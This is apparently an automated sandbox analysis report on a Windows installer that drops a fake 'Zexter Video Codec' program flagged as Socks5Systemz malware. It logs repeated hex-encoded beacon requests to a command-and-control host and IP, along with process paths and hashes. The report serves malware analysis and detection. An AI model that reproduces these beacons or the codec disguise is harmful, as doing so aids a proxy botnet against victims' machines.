                                                                                                    49192.168.2.549765185.208.158.248801216C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 3, 2024 08:40:52.558202982 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:53.253561020 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:53 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    50192.168.2.549766185.208.158.248801216C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 3, 2024 08:40:53.377336979 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:54.075546980 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:53 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    51192.168.2.549767185.208.158.248801216C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 3, 2024 08:40:54.189970970 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:54.886464119 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:54 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20
                                                                                                    Oct 3, 2024 08:40:54.998264074 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:55.242464066 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:55 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    52192.168.2.549768185.208.158.248801216C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 3, 2024 08:40:55.362102985 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:56.045413017 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:55 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20
                                                                                                    Oct 3, 2024 08:40:56.154511929 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:56.394747972 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:56 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    53192.168.2.549769185.208.158.248801216C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 3, 2024 08:40:56.517770052 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:57.227519989 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:57 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    54192.168.2.549772185.208.158.248801216C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 3, 2024 08:40:57.380521059 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:58.064780951 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:57 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    55192.168.2.549773185.208.158.248801216C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 3, 2024 08:40:58.190072060 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:59.086555958 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:58 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20
                                                                                                    Oct 3, 2024 08:40:59.088099957 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:58 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    56192.168.2.549774185.208.158.248801216C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 3, 2024 08:40:59.220988035 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:59.934163094 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:59 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    57192.168.2.549775185.208.158.248801216C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 3, 2024 08:41:00.084393978 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:41:00.787364960 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:41:00 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    58192.168.2.549776185.208.158.248801216C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 3, 2024 08:41:00.934550047 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:41:01.898088932 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:41:01 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    59192.168.2.549777185.208.158.248801216C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 3, 2024 08:41:02.022850990 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:41:02.735198975 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:41:02 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    60192.168.2.549778185.208.158.248801216C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 3, 2024 08:41:02.920604944 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:41:03.596120119 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:41:03 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    61192.168.2.549779185.208.158.248801216C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 3, 2024 08:41:03.724756002 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:41:04.426274061 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:41:04 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    62192.168.2.549780185.208.158.248801216C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 3, 2024 08:41:04.562783003 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:41:05.350626945 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:41:05 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    63192.168.2.549781185.208.158.248801216C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 3, 2024 08:41:05.683391094 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:41:07.092375040 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:41:06 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20
                                                                                                    Oct 3, 2024 08:41:07.092387915 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:41:06 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20
                                                                                                    Oct 3, 2024 08:41:07.094438076 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:41:06 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    64192.168.2.549782185.208.158.248801216C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 3, 2024 08:41:07.215607882 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:41:07.965732098 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:41:07 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Statistics

                                                                                                    CPU Usage

                                                                                                    Click to jump to process

                                                                                                    Memory Usage

                                                                                                    Click to jump to process

                                                                                                    High Level Behavior Distribution

                                                                                                    Click to dive into process behavior distribution

                                                                                                    Behavior

                                                                                                    Click to jump to process

                                                                                                    System Behavior

                                                                                                    General

                                                                                                    Target ID:0
                                                                                                    Start time:02:39:01
                                                                                                    Start date:03/10/2024
                                                                                                    Path:C:\Users\user\Desktop\L9rm7AX4mp.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Users\user\Desktop\L9rm7AX4mp.exe"
                                                                                                    Imagebase:0x400000
                                                                                                    File size:8'333'974 bytes
                                                                                                    MD5 hash:0396163369529CD5B010E3C35A2066C5
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:low
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:1
                                                                                                    Start time:02:39:01
                                                                                                    Start date:03/10/2024
                                                                                                    Path:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp" /SL5="$20420,8045603,54272,C:\Users\user\Desktop\L9rm7AX4mp.exe"
                                                                                                    Imagebase:0x400000
                                                                                                    File size:709'120 bytes
                                                                                                    MD5 hash:16C9D19AB32C18671706CEFEE19B6949
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Antivirus matches:
                                                                                                    • Detection: 4%, ReversingLabs
                                                                                                    Reputation:low
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:3
                                                                                                    Start time:02:39:03
                                                                                                    Start date:03/10/2024
                                                                                                    Path:C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe" -i
                                                                                                    Imagebase:0x400000
                                                                                                    File size:2'586'624 bytes
                                                                                                    MD5 hash:4AC9B0BE70B6E01BFD47FFA47289DED7
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000003.00000002.3288670577.0000000002B20000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    Reputation:low
                                                                                                    Has exited:false

                                                                                                    Disassembly

                                                                                                    Reset < >

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:21.2%
                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                      Signature Coverage:2.4%
                                                                                                      Total number of Nodes:1498
                                                                                                      Total number of Limit Nodes:22
